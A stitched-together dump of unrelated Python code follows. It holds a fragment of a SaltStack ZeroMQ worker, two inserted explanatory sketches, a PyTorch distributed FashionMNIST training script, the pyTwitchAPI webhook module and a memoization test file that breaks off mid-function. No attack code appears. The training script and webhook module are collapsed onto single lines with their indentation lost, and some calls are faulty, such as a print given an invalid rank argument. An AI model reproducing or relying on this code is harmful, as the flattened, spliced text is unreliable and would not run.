        self.aes_funcs = salt.master.AESFuncs(self.opts)
        self.context = zmq.Context(1)
        self.socket = self.context.socket(zmq.REP)
        if self.opts.get('ipc_mode', '') == 'tcp':
            self.w_uri = 'tcp://127.0.0.1:{0}'.format(
                self.opts.get('tcp_master_workers', 4515)
            )
        else:
            self.w_uri = 'ipc://{0}'.format(
                os.path.join(self.opts['sock_dir'], 'workers.ipc')
            )
        log.info('ZMQ Worker binding to socket %s', self.w_uri)
        self.poller = zmq.Poller()
        self.poller.register(self.socket, zmq.POLLIN)
        self.socket.connect(self.w_uri)

    def handle_request(self):
        '''
        Handle a single request
        '''
        try:
            polled = self.poller.poll(1)
            if polled:
                package = self.socket.recv()
                self._update_aes()
                payload = self.serial.loads(package)
                ret = self.serial.dumps(self._handle_payload(payload))
                self.socket.send(ret)
        except KeyboardInterrupt:
            raise
        except Exception as exc:
            # Properly handle EINTR from SIGUSR1
            if isinstance(exc, zmq.ZMQError) and exc.errno == errno.EINTR:
                return
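

# ---------------------------------------------------------------------------
# Illustrative sketch, not part of salt/master.py: a minimal, standalone
# version of the expose_methods / get_method whitelisting pattern that
# TransportMethods uses above to decide which handlers the transport layer
# may call. The class and method names below are invented for the example.
def _expose_methods_demo():
    class Exposed(object):
        # Only names listed here may be handed to the transport layer.
        expose_methods = ('ping',)

        def ping(self):
            return 'pong'

        def secret(self):
            return 'hidden'

        def get_method(self, name):
            # Return the method only if it was explicitly whitelisted.
            if name in self.expose_methods:
                return getattr(self, name, None)
            return None

    exposed = Exposed()
    assert exposed.get_method('ping')() == 'pong'   # exposed method resolves
    assert exposed.get_method('secret') is None     # unexposed method is refused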
train_dist_onnx.py
import time import argparse import sys import os import threading import torch import torch.distributed as dist import torch.nn as nn import torch.nn.functional as F import torch.optim as optim import torch.onnx from math import ceil from random import Random from torch.multiprocessing import Process from torch.autograd import Variable from torchvision import datasets, transforms class Net(nn.Module): """ Network architecture. """ def __init__(self): super(Net, self).__init__() self.conv1 = nn.Conv2d(1, 10, kernel_size=5) self.conv2 = nn.Conv2d(10, 20, kernel_size=5) self.conv2_drop = nn.Dropout2d() self.fc1 = nn.Linear(320, 50) self.fc2 = nn.Linear(50, 10) def forward(self, x): x = F.relu(F.max_pool2d(self.conv1(x), 2)) x = F.relu(F.max_pool2d(self.conv2_drop(self.conv2(x)), 2)) x = x.view(-1, 320) x = F.relu(self.fc1(x)) x = F.dropout(x, training=self.training) x = self.fc2(x) return F.log_softmax(x, dim=1) def get_dataset(): """ Get FashionMNIST dataset """ data_path = os.environ.get("DATA_DIR") + '/data' trainset = datasets.FashionMNIST( data_path, train=True, download=False, transform=transforms.Compose([ transforms.ToTensor(), transforms.Normalize((0.1307, ), (0.3081, )) ])) testset = datasets.FashionMNIST( data_path, train=False, download=False, transform=transforms.Compose([ transforms.ToTensor(), transforms.Normalize((0.1307, ), (0.3081, )) ])) return trainset, testset def average_gradients(model): """ Gradient averaging. """ size = float(dist.get_world_size()) for param in model.parameters(): dist.all_reduce(param.grad.data, op=dist.reduce_op.SUM, group=dist.group.WORLD) param.grad.data /= size def multigpu_average_gradients(model): """ Gradient averaging. """ size = float(dist.get_world_size()) tensor_list = [] for dev_idx in range(torch.cuda.device_count()): tensor_list.append(torch.FloatTensor([1]).cuda(dev_idx)) dist.all_reduce_multigpu(tensor_list, op=dist.reduce_op.SUM, group=dist.group.WORLD) for tensor in tensor_list: tensor /= size*len(tensor_list) def run(rank, size, batch_size, is_gpu): """ Distributed Synchronous SGD Example """ torch.manual_seed(1234) train_set, test_set = get_dataset() result_dir = os.environ.get("RESULT_DIR") + '/saved_model' # For GPU use if is_gpu: #torch.cuda.set_device(local_device) model = Net().cuda() else: model = Net() if not (size == 1): model = torch.nn.parallel.DistributedDataParallel(model) train_sampler = torch.utils.data.distributed.DistributedSampler(train_set, num_replicas=dist.get_world_size(), rank=dist.get_rank()) train_set = torch.utils.data.DataLoader( train_set, batch_size=batch_size, shuffle=(train_sampler is None), sampler=train_sampler, pin_memory=True) test_set = torch.utils.data.DataLoader( test_set, batch_size=batch_size, shuffle=True, pin_memory=True) optimizer = optim.SGD(model.parameters(), lr=0.01, momentum=0.9) # To train model model.train() for epoch in range(100): epoch_loss = 0.0 for data, target in train_set: # For GPU use if is_gpu: data, target = data.cuda(), target.cuda() else: data, target = Variable(data), Variable(target) optimizer.zero_grad() output = model(data) loss = F.nll_loss(output, target) epoch_loss += loss.item() loss.backward() if not (size == 1): average_gradients(model) optimizer.step() print('Process ', ', epoch ', epoch, '. 
avg_loss: ', epoch_loss / len(train_set), rank=dist.get_rank()) # Test model if int(os.environ.get("LEARNER_ID")) == 1: model.eval() test_loss = 0.0 correct = 0 with torch.no_grad(): for data, target in test_set: # For GPU use if is_gpu: data, target = data.cuda(), target.cuda() else: data, target = Variable(data), Variable(target) output = model(data) test_loss += F.nll_loss(output, target, reduction="sum").item() pred = output.data.max(1, keepdim=True)[1] correct += pred.eq(target.data.view_as(pred)).sum().item() print('Test_set: avg_loss: ', test_loss / len(test_set.dataset), ', accuracy: ', 100. * correct / len(test_set.dataset), '%') # Save model if int(os.environ.get("LEARNER_ID")) == 1: torch.save(model, result_dir) dummy_input = "" if is_gpu: dummy_input = Variable(torch.randn(1, 1, 28, 28)).cuda() else: dummy_input = Variable(torch.randn(1, 1, 28, 28)) model_path = os.environ.get("RESULT_DIR") + "/pytorch-dist.onnx" torch.onnx.export(model, dummy_input, model_path) # Change 'backend' to appropriate backend identifier def init_processes(rank, size, fn, path_to_file, batch_size, is_gpu, backend): """ Initialize the distributed environment. """ print("Process ", rank, " connected") dist.init_process_group(backend, init_method=path_to_file, world_size=size, group_name="train_dist", rank=rank) print("FOUND SHARED FILE") fn(rank, size, batch_size, is_gpu) def local_process(target, args): return Process(target=target, args=args) if __name__ == "__main__": parser = argparse.ArgumentParser() parser.add_argument('--batch_size', type=int, default=1024, help='Specify the batch size to be used in training') args = parser.parse_args() # Default batch size is set to 1024. When using a large numbers of learners, # a larger batch size is sometimes necessary to see speed improvements. batch_size = args.batch_size start_time = time.time() num_gpus = int(float(os.environ.get("GPU_COUNT"))) if num_gpus == 0: world_size = int(os.environ.get("NUM_LEARNERS")) else: world_size = num_gpus * int(os.environ.get("NUM_LEARNERS")) data_dir = "file:///job/" + os.environ.get("TRAINING_ID") processes = [] print("data_dir is " + data_dir) if world_size == 1: run(0, 1, batch_size, (num_gpus == 1)) print("COMPLETION TIME: ", time.time() - start_time) else: if num_gpus == 0: p = local_process(init_processes, (0 , world_size, run, data_dir, batch_size, False, 'gloo')) p.start() processes.append(p) else: for process_num in range(0, num_gpus): p = local_process(init_processes, (process_num*int(os.environ.get("NUM_LEARNERS")) + int(os.environ.get("LEARNER_ID")) - 1, world_size, run, data_dir, batch_size, True, 'gloo')) p.start() processes.append(p) for p in processes: p.join() print("COMPLETION TIME: ", time.time() - start_time) # FfDL assume only the master learner job will terminate and store all # the logging file. if int(os.environ.get("LEARNER_ID")) != 1: while True: time.sleep(1000000)
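

# ---------------------------------------------------------------------------
# Illustrative sketch, not part of the original training script: the manual
# all-reduce gradient-averaging step from average_gradients() above, reduced
# to a single tensor so it can be exercised on its own. The gloo backend and
# the file-based init path '/tmp/pt_sync' are assumptions for the example;
# any reachable init_method behaves the same way.
def _all_reduce_average_demo(rank, world_size):
    import torch
    import torch.distributed as dist

    dist.init_process_group('gloo', init_method='file:///tmp/pt_sync',
                            rank=rank, world_size=world_size)
    grad = torch.full((4,), float(rank))        # stand-in for param.grad.data
    dist.all_reduce(grad, op=dist.ReduceOp.SUM)  # sum the tensor across all ranks
    grad /= world_size                           # every rank now holds the mean
    dist.destroy_process_group()
    return grad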
webhook.py
# Copyright (c) 2020. Lena "Teekeks" During <info@teawork.de> """ Full Implementation of the Twitch Webhook ----------------------------------------- .. warning:: Webhooks have been discontinued. The Webhook runs in its own thread, calling the given callback function whenever an webhook event happens. Look at the `Twitch Webhook reference <https://dev.twitch.tv/docs/api/webhooks-reference>`__ to find the topics you are interested in. ************ Requirements ************ You need to have a public IP with a port open. That port will be 80 by default. Authentication is off by default but you can choose to authenticate to use some Webhook Topics or to get more information. .. note:: Please note that Your Endpoint URL has to be HTTPS if you need authentication which means that you probably need a reverse proxy like nginx. You can also hand in a valid ssl context to be used in the constructor. You can check on whether or not your webhook is publicly reachable by navigating to the URL set in `callback_url`. You should get a 200 response with the text `pyTwitchAPI webhook`. ******************* Short code example: ******************* .. code-block:: python from twitchAPI.twitch import Twitch from twitchAPI.webhook import TwitchWebHook from pprint import pprint def callback_stream_changed(uuid, data): print('Callback for UUID ' + str(uuid)) pprint(data) twitch = Twitch(td['app_id'], td['secret']) twitch.authenticate_app([]) user_info = twitch.get_users(logins=['my_twitch_user']) user_id = user_info['data'][0]['id'] # basic setup # Please note that the first parameter is the domain your webhook is reachable from the outside, the last parameter # is the port that the Webhook should use hook = TwitchWebHook("https://my.cool.domain.net:443", 'my_app_id', 8080) hook.authenticate(twitch) hook.start() print('subscribing to hook:') success, uuid = hook.subscribe_stream_changed(user_id, callback_stream_changed) pprint(success) pprint(twitch.get_webhook_subscriptions()) # the webhook is now running and you are subscribed to the topic you want to listen to. lets idle a bit... input('press Enter to shut down') hook.stop() print('done') ********************* Subscription handling ********************* You can subscribe to webhook topics using the :code:`subscribe_` prefixed methods. If :attr:`~.TwitchWebHook.wait_for_subscription_confirm` is True (default), this will wait for the full handshake and confirmation to happen, otherwise the returned success value might be inaccurate in case the subscription itself succeeded but the final handshake failed. You can unsubscribe from a webhook subscription at any time by using :meth:`~twitchAPI.webhook.TwitchWebHook.unsubscribe` If :attr:`~.TwitchWebHook.unsubscribe_on_stop` is True (default), you don't need to manually unsubscribe from topics. By default, subscriptions will be automatically renewed one minute before they run out for as long as the webhook is running. You can also use :meth:`~twitchAPI.webhook.TwitchWebHook.unsubscribe_all` to unsubscribe from all topic subscriptions at once. This will also unsubscribe from topics that where left over from a previous run. *********************** Fixing typical problems *********************** * Make sure that your set URL is reachable from outside your network. * Make sure that you use a non self signed SSL certificate (use one from e.g. Let's Encrypt) if you use any Authentication. 
* If you change your domain's DNS, it can take up to 24 hours (or more) to propagate the changes across the entire internet and reach the Twitch servers. ******************** Class Documentation: ******************** """ from typing import Union, Tuple, Callable, List, Optional from .helper import build_url, TWITCH_API_BASE_URL, get_uuid, get_json, make_fields_datetime, fields_to_enum from .helper import extract_uuid_str_from_url from .types import * import requests from aiohttp import web import threading import asyncio from uuid import UUID from logging import getLogger, Logger import time from .twitch import Twitch from concurrent.futures._base import CancelledError from ssl import SSLContext class TwitchWebHook: """Webhook integration for the Twitch Helix API. :param str callback_url: The full URL of the webhook. :param str api_client_id: The id of your API client :param int port: the port on which this webhook should run :param ~ssl.SSLContext ssl_context: optional ssl context to be used |default| :code:`None` :var str secret: A random secret string. Set this for added security. :var str callback_url: The full URL of the webhook. :var int subscribe_least_seconds: The duration in seconds for how long you want to subscribe to webhhoks. Min 300 Seconds, Max 864000 Seconds. |default| :code:`600` :var bool auto_renew_subscription: If True, automatically renew all webhooks once they get close to running out. **Only disable this if you know what you are doing.** |default| :code:`True` :var bool wait_for_subscription_confirm: Set this to false if you dont want to wait for a subscription confirm. |default| :code:`True` :var int wait_for_subscription_confirm_timeout: Max time in seconds to wait for a subscription confirmation. Only used if ``wait_for_subscription_confirm`` is set to True. |default| :code:`30` :var bool unsubscribe_on_stop: Unsubscribe all currently active Webhooks on calling `stop()` |default| :code:`True` """ secret = None callback_url = None subscribe_least_seconds: int = 600 auto_renew_subscription: bool = True wait_for_subscription_confirm: bool = True wait_for_subscription_confirm_timeout: int = 30 unsubscribe_on_stop: bool = True _port: int = 80 _host: str = '0.0.0.0' __twitch: Twitch = None __task_refresh = None __ssl_context = None __client_id = None __running = False __callbacks = {} __active_webhooks = {} __authenticate: bool = False __hook_thread: Union['threading.Thread', None] = None __hook_loop: Union['asyncio.AbstractEventLoop', None] = None __hook_runner: Union['web.AppRunner', None] = None __logger: Logger = None def __init__(self, callback_url: str, api_client_id: str, port: int, ssl_context: Optional[SSLContext] = None): self.callback_url = callback_url self.__client_id = api_client_id self._port = port self.__ssl_context = ssl_context self.__logger = getLogger('twitchAPI.webhook') raise DeprecatedError() # Webhooks are deprecated and can no longer be used def authenticate(self, twitch: Twitch) -> None: """Set authentication for the Webhook. Can be either a app or user token. 
:param ~twitchAPI.twitch.Twitch twitch: a authenticated instance of :class:`~twitchAPI.twitch.Twitch` :rtype: None :raises RuntimeError: if the callback URL does not use HTTPS """ self.__authenticate = True self.__twitch = twitch if not self.callback_url.startswith('https'): raise RuntimeError('HTTPS is required for authenticated webhook.\n' + 'Either use non authenticated webhook or use a HTTPS proxy!') def __build_runner(self): hook_app = web.Application() hook_app.add_routes([web.get('/users/follows', self.__handle_challenge), web.post('/users/follows', self.__handle_user_follows), web.get('/users/changed', self.__handle_challenge), web.post('/users/changed', self.__handle_user_changed), web.get('/streams', self.__handle_challenge), web.post('/streams', self.__handle_stream_changed), web.get('/extensions/transactions', self.__handle_challenge), web.post('/extensions/transactions', self.__handle_extension_transaction_created), web.get('/moderation/moderators/events', self.__handle_challenge), web.post('/moderation/moderators/events', self.__handle_moderator_change_events), web.get('/moderation/banned/events', self.__handle_challenge), web.post('/moderation/banned/events', self.__handle_channel_ban_change_events), web.get('/hypetrain/events', self.__handle_challenge), web.post('/hypetrain/events', self.__handle_hypetrain_events), web.get('/subscriptions/events', self.__handle_challenge), web.post('/subscriptions/events', self.__handle_subscription_events), web.get('/', self.__handle_default)]) hook_runner = web.AppRunner(hook_app) return hook_runner def __run_hook(self, runner: 'web.AppRunner'): self.__hook_runner = runner self.__hook_loop = asyncio.new_event_loop() asyncio.set_event_loop(self.__hook_loop) self.__hook_loop.run_until_complete(runner.setup()) site = web.TCPSite(runner, str(self._host), self._port, ssl_context=self.__ssl_context) self.__hook_loop.run_until_complete(site.start()) self.__logger.info('started twitch API hook on port ' + str(self._port)) # add refresh task if self.auto_renew_subscription: self.__task_refresh = self.__hook_loop.create_task(self.__refresh_task()) try: self.__hook_loop.run_forever() except (CancelledError, asyncio.CancelledError): pass async def __refresh_task(self): while True: # renew 1 Min before timer runs out: await asyncio.sleep(self.subscribe_least_seconds - 60) # make sure that the auth token is still valid: if self.__authenticate: self.__twitch.refresh_used_token() for key in self.__active_webhooks.keys(): self.renew_subscription(key) def start(self): """Starts the Webhook :rtype: None :raises ValueError: if subscribe_least_seconds is not in range 300 to 864000 :raises RuntimeError: if webhook is already running """ if self.subscribe_least_seconds < 60 * 5 or self.subscribe_least_seconds > 864000: # at least 5 min, max 864000 seconds raise ValueError('subscribe_least_second has to be in range 300 to 864000') if self.__running: raise RuntimeError('already started') self.__hook_thread = threading.Thread(target=self.__run_hook, args=(self.__build_runner(),)) self.__running = True self.__hook_thread.start() def stop(self): """Stops the Webhook Please make sure to unsubscribe from all subscriptions! 
:rtype: None """ if self.__hook_runner is not None: if self.unsubscribe_on_stop: all_keys = list(self.__active_webhooks.keys()) for uuid in all_keys: self.unsubscribe(uuid) if self.auto_renew_subscription: self.__task_refresh.cancel() self.__hook_loop.call_soon_threadsafe(self.__hook_loop.stop) self.__hook_runner = None self.__hook_thread.join() self.__running = False # ================================================================================================================== # HELPER # ================================================================================================================== def __build_request_header(self): headers = { "Client-ID": self.__client_id } if self.__authenticate: token = self.__twitch.get_used_token() if token is None: raise TwitchAuthorizationException('no Authorization set!') headers['Authorization'] = "Bearer " + token return headers def __api_post_request(self, url: str, data: Union[dict, None] = None): headers = self.__build_request_header() if data is None: return requests.post(url, headers=headers) else: return requests.post(url, headers=headers, data=data) def __api_get_request(self, url: str): headers = self.__build_request_header() return requests.get(url, headers=headers) def __add_callable(self, uuid: UUID, callback_func: Union[Callable, None]) -> None: arr = self.__callbacks.get(uuid) if arr is None: arr = [] if callback_func is not None: arr.append(callback_func) self.__callbacks[uuid] = arr def _subscribe(self, callback_path: str, topic_url: str, mode: str = "subscribe", callback_full=True): """"Subscribe to Twitch Topic""" self.__logger.debug(f'{mode} to topic {topic_url} for {callback_path}') data = {'hub.callback': self.callback_url + callback_path, 'hub.mode': mode, 'hub.topic': topic_url, 'hub.lease_seconds': self.subscribe_least_seconds} if not callback_full: data['hub.callback'] = callback_path if self.secret is not None: data['hub.secret'] = self.secret result = self.__api_post_request(TWITCH_API_BASE_URL + "webhooks/hub", data=data) if result.status_code != 202: self.__logger.error(f'Subscription failed! 
status code: {result.status_code}, body: {result.text}') return result.status_code == 202 def _generic_subscribe(self, callback_path: str, url: str, uuid: UUID, callback_func, auth_type: AuthType, auth_scope: List[AuthScope]) -> bool: if auth_type != AuthType.NONE and not self.__twitch.has_required_auth(auth_type, auth_scope): raise UnauthorizedException('required authentication not set or missing auth scope') success = self._subscribe(callback_path+"?uuid=" + str(uuid), url) if success: self.__add_callable(uuid, callback_func) self.__active_webhooks[uuid] = { 'url': url, 'callback': callback_func, 'callback_path': callback_path + "?uuid=" + str(uuid), 'confirmed_subscribe': False, 'confirmed_unsubscribe': False, 'active': False } if self.wait_for_subscription_confirm: timeout = time.time() + self.wait_for_subscription_confirm_timeout while timeout > time.time() and not self.__active_webhooks.get(uuid)['confirmed_subscribe']: time.sleep(0.1) return self.__active_webhooks.get(uuid)['confirmed_subscribe'] return success def _generic_unsubscribe(self, callback_path: str, url: str, callback_full: bool = True) -> bool: return self._subscribe(callback_path, url, mode="unsubscribe", callback_full=callback_full) def _generic_handle_callback(self, request: 'web.Request', data: Union[dict, list, None]) -> 'web.Response': uuid_str = request.rel_url.query.get('uuid') self.__logger.debug(f'handle callback for uuid {uuid_str}') if data is None or uuid_str is None: return web.Response(text="") uuid = UUID(uuid_str) callbacks = self.__callbacks.get(uuid) if callbacks is None: return web.Response(text="") for cf in callbacks: cf(uuid, data) return web.Response(text="") # ================================================================================================================== # SUBSCRIPTION HELPER # ================================================================================================================== __unsubscribe_all_helper = {} def unsubscribe_all(self, twitch: Twitch) -> bool: """Unsubscribe from all Webhooks that use the callback URL set in `callback_url`\n **If `wait_for_subscription_confirm` is False, the response might be True even tho the unsubscribe action failed.** :param ~twitchAPI.twitch.Twitch twitch: App authorized instance of :class:`~twitchAPI.twitch.Twitch` :rtype: bool :returns: True if all webhooks could be unsubscribed, otherwise False. """ self.__unsubscribe_all_helper = {} data = twitch.get_webhook_subscriptions() sub_responses = [] for d in data.get('data', []): uuid = extract_uuid_str_from_url(d.get('callback')) if uuid is not None and d.get('callback').startswith(self.callback_url): self.__unsubscribe_all_helper[uuid] = False sub_responses.append(self._generic_unsubscribe(d.get('callback'), d.get('topic'), callback_full=False)) if self.wait_for_subscription_confirm: timeout = time.time() + self.wait_for_subscription_confirm_timeout while timeout > time.time() and not all(self.__unsubscribe_all_helper.values()): time.sleep(0.1) return all(self.__unsubscribe_all_helper.values()) and all(sub_responses) else: return all(sub_responses) def renew_subscription(self, uuid: UUID) -> bool: """Renew existing topic subscription :param uuid: UUID of the subscription to renew :rtype: bool :returns: True if renewal worked. Note that you still need to wait for the handshake to make sure its renewed. 
""" url = self.__active_webhooks.get(uuid) if url is None: raise Exception(f'no subscription found for UUID {str(uuid)}') self.__logger.info('renewing webhook ' + str(uuid)) return self._subscribe(url.get('callback_path'), url.get('url')) def unsubscribe(self, uuid: UUID) -> bool: url = self.__active_webhooks.get(uuid) if url is None: raise Exception(f'no subscription found for UUID {str(uuid)}') success = self._generic_unsubscribe(url.get('callback_path'), url.get('url')) if success: self.__callbacks.pop(uuid, None) if self.wait_for_subscription_confirm: timeout = time.time() + self.wait_for_subscription_confirm_timeout while timeout > time.time() and not self.__active_webhooks.get(uuid)['confirmed_unsubscribe']: time.sleep(0.05) if self.__active_webhooks.get(uuid)['confirmed_unsubscribe']: self.__active_webhooks.pop(uuid) else: # unsubscribe failed! return False return success # ================================================================================================================== # SUBSCRIPTIONS # ================================================================================================================== def subscribe_user_follow(self, from_id: Union[str, None], to_id: Union[str, None], callback_func: Union[Callable[[UUID, dict], None], None]) -> Tuple[bool, UUID]: """Subscribe to user follow topic. Set only from_id if you want to know if User with that id follows someone.\n Set only to_id if you want to know if someone follows User with that id.\n Set both if you only want to know if from_id follows to_id.\n See https://dev.twitch.tv/docs/api/webhooks-reference#topic-user-follows for documentation :param from_id: str or None :param to_id: str or None :param callback_func: function for callback :raises ValueError: if both from_id and to_id are None :rtype: bool, UUID """ if from_id is None and to_id is None: raise ValueError('specify at least one of from_id and to_id') param_dict = {"first": 1, "from_id": from_id, "to_id": to_id} url = build_url(TWITCH_API_BASE_URL + "users/follows", param_dict, remove_none=True) uuid = get_uuid() return self._generic_subscribe('/users/follows', url, uuid, callback_func, AuthType.NONE, []), uuid def subscribe_stream_changed(self, user_id: str, callback_func: Union[Callable[[UUID, dict], None], None]) -> Tuple[bool, UUID]: """Subscribe to stream changed topic\n See https://dev.twitch.tv/docs/api/webhooks-reference#topic-stream-changed for documentation :param user_id: str :param callback_func: function for callback :rtype: bool, UUID """ param_dict = {"user_id": user_id} url = build_url(TWITCH_API_BASE_URL + "streams", param_dict) uuid = get_uuid() return self._generic_subscribe('/streams', url, uuid, callback_func, AuthType.NONE, []), uuid def subscribe_user_changed(self, user_id: str, callback_func: Union[Callable[[UUID, dict], None], None]) -> Tuple[bool, UUID]: """Subscribe to subscription event topic\n See https://dev.twitch.tv/docs/api/webhooks-reference#topic-user-changed for documentation :param user_id: str :param callback_func: function for callback :rtype: bool, UUID """ param_dict = {"id": user_id} url = build_url(TWITCH_API_BASE_URL + "users", param_dict) uuid = get_uuid() return self._generic_subscribe('/users/changed', url, uuid, callback_func, AuthType.USER, []), uuid def subscribe_extension_transaction_created(self, extension_id: str, callback_func: Union[Callable[[UUID, dict], None], None]) \ -> Tuple[bool, UUID]: """Subscribe to Extension transaction topic\n See 
https://dev.twitch.tv/docs/api/webhooks-reference#topic-extension-transaction-created for documentation :param extension_id: str :param callback_func: function for callback :rtype: bool, UUID """ if not self.__authenticate: # this requires authentication! raise Exception('This subscription requires authentication!') params = { 'extension_id': extension_id, 'first': 1 } url = build_url(TWITCH_API_BASE_URL + 'extensions/transactions', params) uuid = get_uuid() return self._generic_subscribe('/extensions/transactions', url, uuid, callback_func, AuthType.APP, []), uuid def subscribe_moderator_change_events(self, broadcaster_id: str, user_id: Union[str, None], callback_func: Union[Callable[[UUID, dict], None]]) -> Tuple[bool, UUID]: """Subscribe to Moderator Change Events topic\n See https://dev.twitch.tv/docs/api/webhooks-reference#topic-moderator-change-events for documentation :param broadcaster_id: str :param user_id: str or None :param callback_func: function for callback :rtype: bool, UUID """ params = { 'broadcaster_id': broadcaster_id, 'first': 1, 'user_id': user_id } url = build_url(TWITCH_API_BASE_URL + 'moderation/moderators/events', params, remove_none=True) uuid = get_uuid() return self._generic_subscribe('/moderation/moderators/events', url, uuid, callback_func, AuthType.USER, []), uuid def subscribe_channel_ban_change_events(self, broadcaster_id: str, user_id: Union[str, None], callback_func: Union[Callable[[UUID, dict], None]]) -> Tuple[bool, UUID]: """Subscribe to Channel Ban Change Events\n See https://dev.twitch.tv/docs/api/webhooks-reference#topic-channel-ban-change-events for documentation :param broadcaster_id: str :param user_id: str or None :param callback_func: function for callback :rtype: bool, UUID """ params = { 'broadcaster_id': broadcaster_id, 'first': 1, 'user_id': user_id } url = build_url(TWITCH_API_BASE_URL + 'moderation/banned/events', params, remove_none=True) uuid = get_uuid() return self._generic_subscribe('/moderation/banned/events', url, uuid, callback_func, AuthType.USER, []), uuid def subscribe_subscription_events(self, broadcaster_id: str, callback_func: Union[Callable[[UUID, dict], None]], user_id: Union[str, None] = None, gifter_id: Union[str, None] = None, gifter_name: Union[str, None] = None) -> Tuple[bool, UUID]: """Subscribe to Subscription Events Topic\n See https://dev.twitch.tv/docs/api/webhooks-reference#topic-subscription-events for documentation :param broadcaster_id: str :param callback_func: function for callback :param user_id: optional str :param gifter_id: optional str :param gifter_name: optional str :rtype: bool, UUID """ params = { 'broadcaster_id': broadcaster_id, 'first': 1, 'gifter_id': gifter_id, 'gifter_name': gifter_name, 'user_id': user_id } url = build_url(TWITCH_API_BASE_URL + 'subscriptions/events', params, remove_none=True) uuid = get_uuid() return self._generic_subscribe('/subscriptions/events', url, uuid, callback_func, AuthType.USER, [AuthScope.CHANNEL_READ_SUBSCRIPTIONS]), uuid def subscribe_hype_train_events(self, broadcaster_id: str, callback_func: Union[Callable[[UUID, dict], None]]) -> Tuple[bool, UUID]: """Subscribe to Hype Train Events\n See https://dev.twitch.tv/docs/api/webhooks-reference#topic-hype-train-event for documentation :param broadcaster_id: str :param callback_func: function for callback :rtype: bool, UUID """ params = { 'broadcaster_id': broadcaster_id, 'first': 1 } url = build_url(TWITCH_API_BASE_URL + 'hypetrain/events', params) uuid = get_uuid() return 
self._generic_subscribe('/hypetrain/events', url, uuid, callback_func, AuthType.USER, [AuthScope.CHANNEL_READ_HYPE_TRAIN]), uuid # ================================================================================================================== # HANDLERS # ================================================================================================================== async def __handle_default(self, request: 'web.Request'): return web.Response(text="pyTwitchAPI webhook") async def __handle_stream_changed(self, request: 'web.Request'): d = await get_json(request) data = None if d is not None: if len(d['data']) > 0: data = d['data'][0] data = make_fields_datetime(data, ['started_at']) else: data = { 'type': 'offline' } return self._generic_handle_callback(request, data) async def __handle_user_follows(self, request: 'web.Request'): data = await get_json(request) if data is not None: data = data['data'][0] data = make_fields_datetime(data, ['followed_at']) return self._generic_handle_callback(request, data) async def __handle_user_changed(self, request: 'web.Request'): data = await get_json(request) if data is not None: data = data['data'][0] return self._generic_handle_callback(request, data) async def __handle_extension_transaction_created(self, request: 'web.Request'): d = await get_json(request) data = d if data is not None: data = data['data'][0] data = make_fields_datetime(data, ['timestamp']) return self._generic_handle_callback(request, data) async def __handle_challenge(self, request: 'web.Request'): challenge = request.rel_url.query.get('hub.challenge') if challenge is not None: self.__logger.debug(f'received challenge for {request.rel_url.query.get("uuid")}') # found challenge, lets answer it if request.rel_url.query.get('hub.mode') == 'subscribe': # we treat this as active as soon as we answer the challenge self.__active_webhooks.get(UUID(request.rel_url.query.get('uuid')))['active'] = True self.__active_webhooks.get(UUID(request.rel_url.query.get('uuid')))['confirmed_subscribe'] = True if request.rel_url.query.get('hub.mode') == 'unsubscribe': uuid_str = request.rel_url.query.get('uuid') if uuid_str in self.__unsubscribe_all_helper.keys(): self.__unsubscribe_all_helper[uuid_str] = True if UUID(uuid_str) in self.__active_webhooks.keys(): # we treat this as invalid as soon as we answer the challenge if self.wait_for_subscription_confirm: self.__active_webhooks.get(UUID(request.rel_url.query.get('uuid')))['confirmed_unsubscribe'] = True else: self.__active_webhooks.pop(UUID(request.rel_url.query.get('uuid'))) return web.Response(text=challenge) return web.Response(status=500) async def __handle_moderator_change_events(self, request: 'web.Request'): data = await get_json(request) if data is not None: data = data['data'][0] data = make_fields_datetime(data, ['event_timestamp']) return self._generic_handle_callback(request, data) async def __handle_channel_ban_change_events(self, request: 'web.Request'): data = await get_json(request) if data is not None: data = data['data'][0] data = make_fields_datetime(data, ['event_timestamp']) return self._generic_handle_callback(request, data) async def __handle_subscription_events(self, request: 'web.Request'): data = await get_json(request) if data is not None: data = data['data'][0] data = make_fields_datetime(data, ['event_timestamp']) return self._generic_handle_callback(request, data) async def __handle_hypetrain_events(self, request: 'web.Request'): data = await get_json(request) if data is not None: data = data['data'][0] data = 
make_fields_datetime(data, ['event_timestamp', 'cooldown_end_time', 'expires_at', 'started_at']) data = fields_to_enum(data, ['type'], HypeTrainContributionMethod, HypeTrainContributionMethod.UNKNOWN) return self._generic_handle_callback(request, data)
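A minimal usage sketch of the subscribe/callback flow implemented above. The enclosing webhook class, its constructor, and its authenticate()/start()/stop() methods are not visible in this excerpt, so those names and the import path are assumptions (based on older pyTwitchAPI releases); only subscribe_user_follow(), unsubscribe() and wait_for_subscription_confirm are taken from the code above.

# Sketch only, not part of the source file above.
# Assumed: TwitchWebHook(callback_url, client_id, port) with authenticate()/start()/stop().
from uuid import UUID
from twitchAPI.twitch import Twitch
from twitchAPI.webhook import TwitchWebHook   # module path assumed

def on_follow(uuid: UUID, data: dict) -> None:
    # callback_func receives the subscription UUID and the parsed webhook payload
    print(f'{uuid}: {data}')

twitch = Twitch('my_app_id', 'my_app_secret')                        # app-authenticated client
hook = TwitchWebHook('https://my.host.example', 'my_app_id', 8080)   # assumed constructor
hook.authenticate(twitch)                                            # assumed helper
hook.wait_for_subscription_confirm = True   # block until Twitch answers the challenge
hook.start()                                # assumed: starts the aiohttp listener

success, sub_uuid = hook.subscribe_user_follow(from_id=None, to_id='12345',
                                               callback_func=on_follow)
if success:
    # ... run until done ...
    hook.unsubscribe(sub_uuid)
hook.stop()                                 # assumed shutdown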
test.py
import unittest from memoization import cached, CachingAlgorithmFlag, _memoization from itertools import chain from threading import Thread import random from threading import Lock import weakref import gc import time make_key = _memoization._make_key # bind make_key function exec_times = {} # executed time of each tested function lock = Lock() # for multi-threading tests random.seed(100) # set seed to ensure that test results are reproducible for i in range(1, 12): exec_times['f' + str(i)] = 0 # init to zero ################################################################################ # Tested functions ################################################################################ @cached def f1(x): exec_times['f1'] += 1 return x @cached() def f2(x): exec_times['f2'] += 1 return x @cached(max_size=5, algorithm=CachingAlgorithmFlag.FIFO, thread_safe=False) def f3(x): exec_times['f3'] += 1 return x @cached(max_size=5, algorithm=CachingAlgorithmFlag.LRU, thread_safe=False) def f4(x): exec_times['f4'] += 1 return x @cached(max_size=5, algorithm=CachingAlgorithmFlag.LFU, thread_safe=False) def f5(x): exec_times['f5'] += 1 return x @cached(max_size=5, algorithm=CachingAlgorithmFlag.FIFO, thread_safe=True) def f6(x): with lock: exec_times['f6'] += 1 return x @cached(max_size=5, algorithm=CachingAlgorithmFlag.LRU, thread_safe=True) def f7(x): with lock: 